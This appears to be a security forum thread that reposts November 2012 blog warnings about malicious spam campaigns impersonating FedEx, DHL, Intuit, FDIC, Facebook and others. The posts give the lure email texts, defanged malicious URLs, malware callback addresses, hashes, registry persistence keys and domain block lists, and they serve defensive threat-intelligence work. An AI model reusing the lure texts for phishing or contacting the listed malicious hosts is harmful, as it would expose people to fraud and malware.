23 Nov 2012 - "It looks like there are a set of exploit sites in the range 5.135.192.16/30 serving up TrueType exploits (such as CVE-2011-3402) which is being pushed by a malicious URL at [donotclick]mwko.zsomteltepngs .info/40c0dee71a9b9d715539b7d56c3d5f23.eot . The potentially malicious sites in this range include:
10bloodek.info
1bloodek .info
5helnima .net
anotepad .info
asomteltepngs .info
jhqp.bcodec .info
ksmuaelteory .net
mwko.zsomteltepngs .info
osmuaelteory .net
psmuaelteory .net
qfgc.hlegolaj .net
qsomteltepngs .info
rsomelostell .net
shelnima .net
whelnima .net
xsomteltepngs .info
ysomteltepngs .info
zbav.hsomteltepngs .info
If you're interesting in blocking whole domains rather than subdomains then here's a list you can use:
10bloodek .info
1bloodek .info
5helnima .net
anotepad .info
asomteltepngs .info
bcodec .info
hlegolaj .net
hsomteltepngs .info
ksmuaelteory.net
osmuaelteory .net
psmuaelteory .net
qsomteltepngs .info
rsomelostell .net
shelnima .net
whelnima .net
xsomteltepngs .info
ysomteltepngs .info
zsomteltepngs .info ..."
> https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 5626 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-24, and the last time suspicious content was found was on 2012-11-24... we found 856 site(s) on this network... that appeared to function as intermediaries for the infection of 6279 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1369 site(s)... that infected 21258 other site(s)..."
___
Fake "Changlog 10.2011" SPAM / efaxinok .ru
- http://blog.dynamoo.com/2012/11/changlog-102011-spam-efaxinokru.html
23 Nov 2012 - "This spam leads to malware on efaxinok .ru:
Date: Fri, 23 Nov 2012 10:14:22 +0600
From: "Contact" [customer-notification @ ups .com]
Subject: Re: Changlog 10.2011
Attachments: changelog-212.htm
Good morning,
as promised changelog (Internet Explorer File)
The victim is enticed to click on the attachment which leads to a malicious payload on [donotclick]efaxinok .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186
203.80.16.81
208.87.243.131
216.24.196.66
These are the same IPs as used in this attack yesterday*, and it forms part of a long-running malcious spam run which appears to have been going on forever. Of note, there's a new domain in this cluster of delemiator .ru which I haven't seen yet being used in a malicious spam run, but it probably will be.
* http://blog.dynamoo.com/2012/11/facebook-spam-ceredinoplru.html
___
Fake FDIC ‘Your activity is discontinued’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/23/cybercriminals-spamvertise-millions-of-fdic-your-activity-is-discontinued-themed-emails-serve-client-side-exploits-and-malware/
Nov 23, 2012 - "A currently ongoing spam campaign attempts to trick users into thinking that their ability to send Domestic Wire Transfers has been disabled. Impersonating the Federal Deposit Insurance Corporation (FDIC), the cybercriminals behind the campaign are potentially earning thousands of dollars in the process of monetizing the anticipated traffic. Once users click on the bogus ‘secure download link’, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/fdic_email_spam_exploits_malware.png
... Client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
stifferreminders .pro – 198.27.94.80 (AS16276) – Email: kee_mckibben0869 @macfreak .com
Name Server:NS1.CHELSEAFUN .NET
Name Server:NS2.CHELSEAFUN .NET
These are well known name servers currently in use by the same cybercriminals that launched the following malicious campaigns – “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware“; “‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit“; “‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit“; “Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed emails, serve client-side exploits and malware“.
The following malicious domains also respond to the same IP:
headerandfooterprebuilt .pro
fixedmib .net
stafffire .net ...
Upon successful client-side exploitation, the campaign drops MD5: 61bc6ad497c97c44b30dd4e5b3b02132 * ... UDS:DangerousObject.Multi.Generic.
Once executed, the sample phones back to hxxp ://182.237.17.180 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/.."
* https://www.virustotal.com/file/5de7a60969d0cba0b25ead750adb8518b564549ea5f9a87f875295c396effa98/analysis/
File name: test45286142972065.bin
Detection ratio: 2/43
Analysis date: 2012-11-21
:mad:
AplusWebMaster
2012-11-27, 04:25
FYI...
Phishing SCAM asks for TAN list photo
- http://h-online.com/-1757018
26 Nov 2012 - "A new phishing email circulating in Germany is asking customers of the country's largest banking establishment, Deutsche Bank, to upload photographs or scans of their bank-issued TAN (Transaction Authentication Number) list to a maliciously fabricated web site. TANs are used by many banks in Germany to authenticate transactions during online banking sessions. The customer receives a printed list of TANs, essentially one-time passwords, via mail and has to use a randomly selected number from the list each time they want to send money or approve other transactions. The phishing email directs users to a deceptive web page where the scammers claim that the upload of the TAN list is needed as Deutsche Bank supposedly changes their iTAN technology for a mobile TAN (mTAN) system on 1 January 2013... The short time frame is apparently designed to increase the pressure on the victims of the phishing emails. The H's associates at heise online received copies of similar emails that were apparently asking for the information to be uploaded by the next day or the customer's account would be disabled... The web sites are a professional reproduction of Deutsche Bank's actual online banking interface..."
___
- https://isc.sans.edu/diary.html?storyid=14578
Last Updated: 2012-11-27
>> http://www.antiphishing.org/resources/apwg-reports/
:mad::fear:
AplusWebMaster
2012-11-27, 15:50
FYI...
Bogus Facebook ‘pending notifications’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/27/bogus-facebook-pending-notifications-themed-emails-serve-client-side-exploits-and-malware/
27 Nov 2012 - "A recently launched malicious spam campaign is impersonating Facebook, Inc. in an attempt to trick its one billion users into thinking that they’ve received a notification alerting them on activities they may have missed on Facebook. Upon clicking on any of the links found in the email, users are exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/facebook_pending_notifications_email_spam_exploits_malware1.png
... Malicious payload serving URL: hxxp ://ceredinopl .ru:8080/forum/links/column.php?cfcjm=xbc229&fnhcuc=njx&svdp=2v:1k:1m:32:33:1k:1k:31:1j:1o&xdva=
Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
ceredinopl .ru – 203.80.16.81 (AS24514); 208.87.243.131; 216.24.196.66 (AS40676); 202.180.221.186 (AS24496)...
Upon successful client-side exploitation the campaign drops MD5: 9db13467c50ef248eaf6c796dffdd19c * ...PWS-Zbot.gen.aqw.
Responding to the same IPs – 203.80.16.81 (AS24514); 208.87.243.131; 216.24.196.66 (AS40676); 202.180.221.186 (AS24496)...
If users feel they received a bogus email that may not be coming from Facebook, they can alert Facebook by forwarding the message to phish@fb.com . In addition, users can check to see if their account has been compromised by visiting https://www.facebook.com/hacked ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1748f38a7c0d4ac1aa023dac666727fb799ded5fc946b2b7732cc3a5da51290d/analysis/
File name: 413823066bcca9a7b298015fcba37b74a94d1950
Detection ratio: 28/43
Analysis date: 2012-11-25
___
Fake Browser Updates - Malicious Ads...
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-ads-push-fake-browser-updates/
Nov 26, 2012 - "Thinking of updating your web browsers? Just make sure that you download from legitimate sources, instead of downloading malware disguised as browser updates onto your system. Just recently, we were alerted to a report* of several websites offering updates for Internet browsers like Firefox, Chrome, and Internet Explorer just to name some. Users may encounter these pages by clicking malicious ads. The bad guys behind this threat made an effort to make this ruse appear legitimate. These pages, as seen below, were made to look like the browsers’ official sites. To further convince users to download the fake update, the sites even offers an integrated antivirus protection:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/11/fake_update_browsers.gif
Instead of an update, users download a malware detected asJS_DLOADR.AET, which was found capable of changing the downloaded binary to have a different payload. The malicious JavaScript, in turn, downloads TROJ_STARTPA.AET and saved it as hxxp ://{BLOCKED}browserupdate/install.exe. Based on our initial analysis, the Trojan modifies the user’s Internet Explorer home page to hxxp ://{BLOCKED}rtpage .com, a site that may host other malicious files that can further infect a user’s system... To avoid this ruse, users must exclusively download updates from a legitimate source or the software vendor’s official websites. Many browsers also include an integrated auto-update feature..."
* http://stopmalvertising.com/malvertisements/securebrowserupdate.com-wants-to-update-your-browser-with-malware.html
securebrowserupdate .com = malvertisement...
23 Nov 2012 - "... Internet users are told that their current browser version is out of date and they are invited to install the latest update. Victims are redirected to securebrowserupdate .com via a malvertisement. The domain securebrowserupdate .com has been registered on the 16th November 2012 via name .com. The registrant details are protected by a privacy service..."
___
Bogus ‘Pay by Phone Parking Receipts’ serve malware
- http://blog.webroot.com/2012/11/27/cybercriminals-target-u-k-users-with-bogus-pay-by-phone-parking-receipts-serve-malware/
Nov 27, 2012 - "U.K users, beware! Cybercriminals are currently mass mailing yet another malicious spam campaign, enticing users into viewing a -bogus- list of parking transactions. Upon executing the malicious attachment, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign complete access to the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/uk_pay_by_phone_receipt_email_spam_malware.png
Sample detection rate for the malicious attachment: MD5: fbde5bcb8e3521149d2f83888e1716c4 * ... Worm:Win32/Gamarue.I**
* https://www.virustotal.com/file/2e8f3a5fd6605821fbf071c1da6b90cb18903a433cf44776432625a4a1e58727/analysis/1353772427/
File name: Pay_by_Phone_Parking_Receipt.pdf.exe
Detection ratio: 38/44
Analysis date: 2012-11-24
** https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FGamarue.I
___
Fake Multiple ‘Inter-company’ invoice emails serve malware and client-side exploits
- http://blog.webroot.com/2012/11/27/multiple-inter-company-invoice-themed-campaigns-serve-malware-and-client-side-exploits/
27 Nov 2012 - "... cybercriminals have been persistently spamvertising ‘Inter-company invoice’ themed emails, in an attempt to trick users into viewing the malicious .html attachment, or unpack and execute the malicious binary found in the attached archives. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/inter_company_invoice_email_spam_exploits_malware.png
... Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
controlleramo .ru
Name server: ns1.controlleramo .ru – 62.76.186.190
Name server: ns2.controlleramo .ru – 132.248.49.112
Name server: ns3.controlleramo .ru – 84.22.100.108
Name server: ns4.controlleramo .ru – 65.99.223.24 ...
Upon successful client-side exploitation the campaign drops MD5: de48416449621ecd62b116cc41aa5bcc * ... Worm:Win32/Cridex.E...
The second sample obtained from yet another spamvertised archive with MD5: 3a8ce3d72b60b105783d74dbc65c37a6 ** ... Worm:Win32/Cridex.E. Upon execution it phones back to the following URL: 188.40.0.138 :8080/AJtw/UCyqrDAA/Ud+asDAA (AS24940, HETZNER-AS)..."
* https://www.virustotal.com/file/cac2d05cab26c70c11ef6e2e37f6693b387fb9c86b10d58835d917375f6bbf6a/analysis/
File name: de48416449621ecd62b116cc41aa5bcc
Detection ratio: 30/44
Analysis date: 2012-11-11
** https://www.virustotal.com/file/245db8d2f65c7bb476be3d8d3c6c9edc6af9b4827b54ec988157a8ead358074d/analysis/1353769289/
File name: Invoices_12_N88283.exe
Detection ratio: 37/44
Analysis date: 2012-11-24
___
"Copies of Policies" spam / ganiopatia .ru
- http://blog.dynamoo.com/2012/11/copies-of-policies-spam-ganiopatiaru.html
27 Nov 2012 - "This spam leads to malware on ganiopatia .ru:
Date: Mon, 26 Nov 2012 02:31:10 -0500
From: sales1 @ victimdomain .com
Subject: RE: ALINA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ALINA Prater,
==========
Date: Mon, 26 Nov 2012 02:26:33 +0300
From: ALISHIADBSukwQEf @aol .com
Subject: RE: ALISHIA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ALISHIA Gee,
==========
From: accounting @ victimdomain .com
Sent: 26 November 2012 08:42
Subject: RE: MARCELLE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARCELLE SPENCE,
==========
From: accounting @ victimdomain .com
Sent: 26 November 2012 07:54
Subject: RE: KASSIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
KASSIE ROMANO,
The malicious payload is at [donotclick]ganiopatia .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)
Note that ganalionomka .ru is also on the same cluster of servers and will also be malicious. These IP addresses have been used for malware several times, blocking access to them would be a good idea."
___
BeyondTek IT / beyondtekit .com SPAM
- http://blog.dynamoo.com/2012/11/beyondtek-it-beyond-tek-it.html
27 Nov 2012 - "Here's an annoying spammer.. but who are they exactly?
From: Nick Snow ---- BeyondTekIT Nick @ beyondtekit .com
Date: 27 November 2012 10:24
Subject: Your IT Jobs - HR
Hello:
The IT market is extremely HOT right now and there is no doubt that, there is a severe shortage of qualified, experienced IT candidates and an over-abundance of IT jobs being advertised by companies all over the country. It seems, most qualified candidates are in such high demand that they are getting multiple offers, which is making it difficult for companies to fill certain positions.
That being said please let me know if you currently have any hard-to-fill IT positions at that we could provide candidates for. We can assist with contract, contract-to-hire/temp-to-perm, or permanent positions.
We have candidates available across all technologies and skill-sets, including (this is only a partial list):
Programmers/Developers - Java, C++, .Net, Ruby, Web, Perl, Python, PHP, ColdFusion, etc
Systems Analysts / Business Analysts
QA Engineers/Analysts/Testers
DBA's - SQL Server, Oracle, MySQL, etc
SAP Consultants - Technical, Functional, Techno-Functional, Analysts, Developers
Oracle Consultants - Technical, Functional, Techno-Functional, Analysts, Developers
Data Warehouse/Business Intelligence Developers/Engineers - ETL, SSIS, SSAS, SSRS, Cognos, etc
Project Managers
Systems Administrators - Linux, Window, etc
Executive - CIO, CTO, VP of IT, etc
PS - We have just started offering our clients a business model of hiring off-site developers, who can be your employees but working from our office in India. Please ask me for more details, and I can send you our PowerPoint presentation.
Thank you.
Nick Snow
BeyondTek IT
Tel: 714-572-1544
nick @ beyondtekit .com
www .BeyondTekIT .com
The spam (and it is spam) originates from a server on 216.14.62.75 (Telepacific Communications, Los Angeles) which also hosts the beyondtekit .com and beyondtechit .com domains...
I personally wouldn't recommend giving any personal details to spammers, and I certainly wouldn't recommend giving details to a company that seems to spend some effort to conceal who they really are. But, bear in mind that there are no anti-spam laws in India which explains the high level of Indian spam messages (think SEO spam)..."
:mad::mad::mad::mad:
AplusWebMaster
2012-11-28, 03:05
FYI...
Wire transfer SPAM / gurmanikia .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-gurmanikiaru.html
27 Nov 2012 - "This fake wire transfer spam leads to malware on gurmanikia.ru:
Date: Tue, 27 Nov 2012 01:14:15 -0500
From: Emerita Ayers via LinkedIn [member @ linkedin .com]
Subject: RE: Your Wire Transfer N27172774
Dear Customers,
Wire debit transfer was canceled.
Canceled transfer:
FED NUMBER: 6946432301WIRE298280
Transaction Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]gurmanikia .ru:8080/forum/links/column.php hosted on the following well-known malicious IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)..."
___
FedEx SPAM / PostalReceipt .zip
- http://blog.dynamoo.com/2012/11/fedex-spam-postalreceiptzip.html
27 Nov 2012 - "A slightly new take on the malicious FedEx spam we've seen recently. This time, the link in the email goes to a hacked domain to download an attachment called PostalReceipt.zip
Date: Tue, 27 Nov 2012 13:04:37 -0400
From: "Office Mail" [no_replyFRL @ cleveland .com]
Subject: ID (I)JI74 384 428 2295 7492
FedEx
Order: AX-7608-99659670234
Order Date: Sunday, 25 November 2012, 10:35 AM
Dear Customer,
Your parcel has arrived at the post office at November 27.Our postrider was unable to deliver the parcel to you.
To receive a parcel, please, go to the nearest our office and show this postal receipt.
GET POSTAL RECEIPT
Best Regards, The FedEx Team.
FedEx 1995-2012
In this case the download site was [donotclick]amsterdam.cathedralsoft .com/TFOIATVZVT.html hosted on 46.105.140.157 (OVH, Spain). www .cathedralsoft .com is hosted on 94.23.187.176 (also OVH, Spain). It looks like cathedralsoft .com has been compromised in this attack.
VirusTotal detection rates are very low*. I don't currently have an analysis of the malicious payload."
* https://www.virustotal.com/file/f0b29e1f5616ea7dd35e041e7f4ece19692375530e3ae4b7a8e22249d0f2d9c4/analysis/1354056475/
File name: PostalReceipt.exe
Detection ratio: 1/44
Analysis date: 2012-11-27
:mad::mad:
AplusWebMaster
2012-11-28, 10:01
FYI...
Bogus DHL emails serve malware
- http://blog.webroot.com/2012/11/28/bogus-dhl-express-delivery-notifications-serve-malware/
Nov 28, 2012 - "From UPS, USPS to DHL, bogus and malicious parcel tracking confirmations are a common social engineering technique often used by cybercriminals to trick users into clicking on malicious links or executing malicious attachments found in the spamvertised emails. Continuing what appears to be a working social engineering tactic, cybercriminals are currently mass mailing bogus DHL ‘Express Delivery Notifications’ in an attempt to trick users into executing the malicious attachment. Once executed, it opens a backdoor on the affected host allowing the cybercriminals behind the campaign complete access to the infected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/dhl_express_tracking_notification_email_spam_malware.png
Sample detection rate for the malicious attachment: MD5: b0d4dad91f8e56caa184c8ba8850a6bd * ... Trojan-Downloader.Win32.Andromeda.daq.
What’s particularly interesting about this MD5 is that there are files named T-Mobile-Bill.pdf.exe that have also been submitted to VirusTotal, indicating that there’s a -another- T-Mobile themed campaign, that’s currently circulating in the wild. PEiD Signature of the file: BobSoft Mini Delphi -> BoB / BobSoft. It also creates %AllUsersProfile%\svchost.exe on the system, plus a Registry Value – “[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] SunJavaUpdateSched = “%AllUsersProfile%\svchost.exe” so that svchost.exe runs every time Windows starts."
* https://www.virustotal.com/file/148a7751e26a29f07cfe21447798e91d5863389a8bc7da25c70b009f48e7f73e/analysis/1353774086/
File name: DHL-EXPRESS-DELIVERY-NOTIFICATION.exe
Detection ratio: 34/42
Analysis date: 2012-11-24
___
Fake Angry Birds Star Wars Android SMS Sender
- http://www.gfi.com/blog/the-fail-is-strong-with-this-one-angry-birds-star-wars-android-sms-sender/
Nov 28, 2012 - "Back in April, fake copies of Angry Birds Space were in circulation – with the recent release of Angry Birds Star Wars, scammers have caused a great disturbance in the Force, as if millions of phones cried out in terror and were suddenly silenced... Fake apps are once again the order of the day – here’s one our Labs have found and taken a look at, offered up for download from a dedicated website over at
angrybirdsstarwars-android(dot)ru [ 5.9.112.10 - AS24940**]
> http://www.gfi.com/blog/wp-content/uploads/2012/11/angrybirdsstarwarsfakeapp1.png
As with so many similar fakeouts, Android owners must download the app from the website then install it on their phone (downloading with anything other than your mobile device – say, a web browser – offers up a .jar file instead)... This one acts like a typical Boxer Android file, sending premium SMS messages before downloading a valid version of the software. All in all, a rather costly mistake given you could pay the one time fee for the legitimate Google Play download and Angry Bird yourself into a (non-scammed) frenzy instead. VirusTotal results can be found here*, and we detect this as Trojan.AndroidOS.Generic.A with VIPRE Mobile.
End-users should always be cautious of websites offering up Android files that aren’t the Google Play store, especially when based around a hot new property or must-have game..."
* https://www.virustotal.com/file/d1ebad2d042f2ccfc0f3b94141d69997280de84223007cad6b59346d0e309a69/analysis/1354052956/
File name: Angry_Birds_Star_Wars_install.apk
Detection ratio: 7/43
Analysis date: 2012-11-27
** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5998 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-28, and the last time suspicious content was found was on 2012-11-28... Over the past 90 days, we found 817 site(s)... that appeared to function as intermediaries for the infection of 4963 other site(s)... We found 1714 site(s)... that infected 9332 other site(s)..."
> http://sitevet.com/db/asn/AS24940
Blacklisted URLs: 3081
___
Changelog SPAM / ganadeion .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-ganadeionru.html
28 Nov 2012 - "This fake changelog spam leads to malware at ganadeion .ru:
Date: Wed, 28 Nov 2012 05:21:35 -0500
From: LinkedIn Password [password @ linkedin .com]
Subject: Re: Changelog as promised (upd.)
Hello,
as prmised updated changelog - View
C. BERGMAN
The malicious payload is at [donotclick]ganadeion .ru:8080/forum/links/column.php hosted on some familiar looking IP addresses that you should block if you can:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)"
___
Fake UPS email serves Fake AV
- http://www.gfi.com/blog/festive-ups-delivery-notice-serves-up-fake-av/
Nov 28, 2012 - "... seasonal looking fake UPS delivery notification, claiming in broken English that “Your package delivered to the nearest Postal Office. When receiving, please show a mailing receipt. Address of the nearest office you can find on our website”.
> http://www.gfi.com/blog/wp-content/uploads/2012/11/tumblr_me5e2caxNI1r6pupn.png
Depending on the spam campaign you happen to stumble upon, you’ll most likely be redirected through a collection of websites before arriving at your final destination which in this case happens to be Fake AV – specifically, System Progressive Protection.
> http://www.gfi.com/blog/wp-content/uploads/2012/11/upsfakeav2.png
Fake UPS spam is a perennial favourite of Malware pushers... We detect the above as Lookslike.Win32.Winwebsec.p (v)... treat delivery notification emails with the utmost caution. If in doubt, simply visit the website of your chosen parcel delivery service and have fun typing in tracking codes instead. It’s a lot safer."
:mad::mad:
AplusWebMaster
2012-11-29, 13:56
FYI...
Fake T-mobile U.K. malicious emails
- http://blog.webroot.com/2012/11/29/cybercriminals-impersonate-t-mobile-u-k-serve-malware/
Nov 29, 2012 - "Cybercriminals are currently impersonating T-Mobile U.K, in an attempt to trick its customers into downloading a bogus billing information report. Upon execution, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign complete access to the infected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/t-mobile_uk_email_spam_billing_malware.png
... malicious executable: MD5: b0d4dad91f8e56caa184c8ba8850a6bd * ... Worm:Win32/Gamarue
That’s the same MD5 that was served in the recently profiled “Bogus DHL ‘Express Delivery Notifications’ serve malware” malicious campaign..."
* https://www.virustotal.com/file/148a7751e26a29f07cfe21447798e91d5863389a8bc7da25c70b009f48e7f73e/analysis/1353777713/
File name: T-Mobile-Bill.pdf.exe
Detection ratio: 35/44
Analysis date: 2012-11-24
___
Fake Vodafone U.K. malicious emails
- http://blog.webroot.com/2012/11/28/cybercriminals-impersonate-vodafone-u-k-spread-malicious-mms-notifications/
Nov 28, 2012 - "Over the past couple of days, cybercriminals have launched yet another massive spam campaign, once again targeting U.K users. This time, they are impersonating Vodafone U.K, in an attempt to trick its customers into executing a bogus MMS attachment found in the malicious emails. Upon execution, the sample opens a backdoor on the affected hosts, allowing the cybercriminals behind the campaign complete access to the affected PC...
Sample screenshot from the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/vodafone_uk_email_spam_malware_mms_notification.png
... malicious attachment: MD5: 3ce2b9522a476515737d07b877dae06e * ... Trojan-Downloader.Win32.Andromeda.coh.
Upon execution, the sample creates %AllUsersProfile%\svchost.exe on the host. It also creates a Registry Value - [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] -> SunJavaUpdateSched = “%AllUsersProfile%\svchost.exe” so that svchost.exe starts evert time Windows starts..."
* https://www.virustotal.com/file/cd3e6a441f64afb86360aca4983db734e495e21df2d4d98422288a4f1664a480/analysis/1353773239/
File name: Vodafone_MMS.jpg.exe
Detection ratio: 36/44
Analysis date: 2012-11-24
___
More "Wire Transfer" SPAM / dimarikanko .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-dimarikankoru.html
29 Nov 2012 - "This fake "Wire Transfer" spam leads to malware on dimarikanko .ru:
Date: Thu, 29 Nov 2012 06:01:55 +0700
From: LinkedIn Connections [connections @ linkedin .com]
Subject: Re: Fwd: Wire Transfer (75631MU030)
Dear Bank Account Operator,
WIRE TRANSFER: FED675249061747420
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]dimarikanko .ru:8080/forum/links/column.php hosted on a bunch of familiar looking IP addresses which have been used in several recent attacks:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)..."
___
Vobfus sites to block
- http://blog.dynamoo.com/2012/11/vobfus-sites-to-block.html
29 Nov 2012 - "These domains and sites appear to be connected to the Vobfus worm, hosted on 222.186.36.108 (Chinanet Jiangsu Province Network). There seems to be quite a bit of this -worm- about..."
(More detail at the dynamoo URL above.)
What’s the Fuss with WORM_VOBFUS?
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/
Nov 29, 2012 - "Some malware are more persistent than others – like WORM_VOBFUS. This recent heap of WORM_VOBFUS variants seen spreading on Facebook does not exhibit new routines, but it is a good reminder for users about well-known, but easily forgotten safe computing practices... Disabling AUTORUN has its merits – but not everyone knows. Worms, like WORM_VOBFUS, are known to propagate by taking advantage of Windows Autorun feature on drives. To address this, users are often advised to disable Autorun to prevent their drives from being infected. For reason of inconvenience (or maybe forgetfulness?) users do -not- disable this feature... As WORM_VOBFUS and other threats using old but reliable exploit show, threats do not burn and turn into ashes easily. Sometimes, they fade away but surface again..."
___
Dynamic DNS sites you might want to block II
- http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to_29.html
29 Nov 2012 - "These Dynamic DNS domains belong to a mystery outfit called dnsdynamic .org, and several of them seem to be in the process of being abused by third parties (for example). The registrations seem to be anonymised, some poking around at the recent WHOIS history of one of these domains (freedynamicdns .com) reveals ownership details of:
Manager, Domain manager @ invertebrateisp .com
Invertebrate ISP
PO Box 405
Glenmont, New York 12077
United States
+1.2623946781
More digging at invertabrateisp .com comes up with a real name:
Wilde, Tim [redacted]
[redacted]
Glenmont, New York 12077
United States
[redacted] Fax --
Anyway, Mr Wilde is -not- connected with the malicious activity going on with these domains, but he is providing a service that is being abused. Interestingly he founded DynDNS before selling it on. Dynamic DNS services can be useful, but my personal recommendation is that you should consider blocking them as the bad guys are very good at abusing them. Overall, these are not as bad as the ones run by ChangeIP .com (see here*). There are two versions of this list, one links through to the Google Safe Browsing diagnostics report in case you want to review them on a case-by-case basis before blocking them (-yellow- highlighted ones have some malware, -red- highlighted ones are blocked by Google). The second one is a plain list of everything in case you want to block them completely..."
(More detail and "the lists" at the dynamoo URL above)
* http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to.html
___
DNS server redirections ...
- http://www.theregister.co.uk/2012/11/28/google_romania_dns_hack/
28 Nov 2012 - "A hacker -redirected- web surfers looking for Yahoo, Microsoft or Google to a page showing a TV test card by apparently poisoning Google's public DNS system. Punters and organisations relying on Google's free service were affected, rather than the websites themselves being compromised. Visitors to yahoo .ro, microsoft .ro and google .ro were served a message from an Algerian miscreant using the moniker MCA-CRB. Traffic destined for the Romanian websites of Kaspersky Lab and Paypal was also hijacked... MCA-CRB is a prolific online graffiti artist who has defaced at least 5,000 sites, according to records kept by Zone-H*. The latest attack was carried out to gain bragging rights rather than to trouser a profit or stage a political protest... Last week, defaced copies of Google, Yahoo!, Microsoft, eBay and Apple's Pakistan websites were shown to surfers, again as a result of a DNS hijack... the affected Romanian sites was restored by Wednesday lunchtime, except Paypal.ro which proved difficult to reach in any case..."
* http://www.zone-h.org/archive/notifier=MCA-CRB
___
Bogus ‘Meeting Reminder” emails serve malware
- http://blog.webroot.com/2012/11/29/bogus-meeting-reminder-themed-emails-serve-malware/
Nov 29, 2012 - "Cybercriminals are mass mailing malicious emails about a meeting you wouldn’t want to attend .. Once executed, the malicious attachment opens a backdoor on the affected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host. Naturally, we’ve been monitoring their operations for quite some time, and are easily able to identify multiple connections between their previously launched campaigns...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/bogus_meeting_reminder_email_spam_malware.png
... the malicious executable: MD5: a684feff699bb7e3b8814c32c1da8277 * ... Worm:Win32/Cridex.E.
It also creates the following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
The newly created Registry Value is:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
KB00121600.exe = “”%AppData%\KB00121600.exe” so that KB00121600.exe runs every time Windows starts.
Upon execution, the sample phones back to 64.150.187.72 :8080/AJw/UCygrDAA/Ud+asDAA (AS10316**)... We’ve also seen the same IP (64.150.187.72) used as name server in a previously profiled malicious campaign..."
* https://www.virustotal.com/file/1be5993395114936a0d60f0e0b92f3dcc9442287e1c18f503a452431e3f5ec4e/analysis/1353778430/
File name: Report.exe
Detection ratio: 38/44
Analysis date: 2012-11-24
** https://www.google.com/safebrowsing/diagnostic?site=AS:10316
:mad::mad:
AplusWebMaster
2012-11-30, 20:08
FYI...
Bogus ‘Intuit Software Order Confirmations’ lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/30/bogus-intuit-software-order-confirmations-lead-to-black-hole-exploit-kit/
Nov 30, 2012 - "Sticking to their well proven practice of systematically rotating impersonated brands, the cybercriminals behind a huge majority of the malicious campaigns that we’ve been profiling recently are once again impersonating Intuit in an attempt to trick its customers into clicking on links exposing them to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot from the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/fake_intuit_software_order_confirmation_email_spam_exploits_malware.png
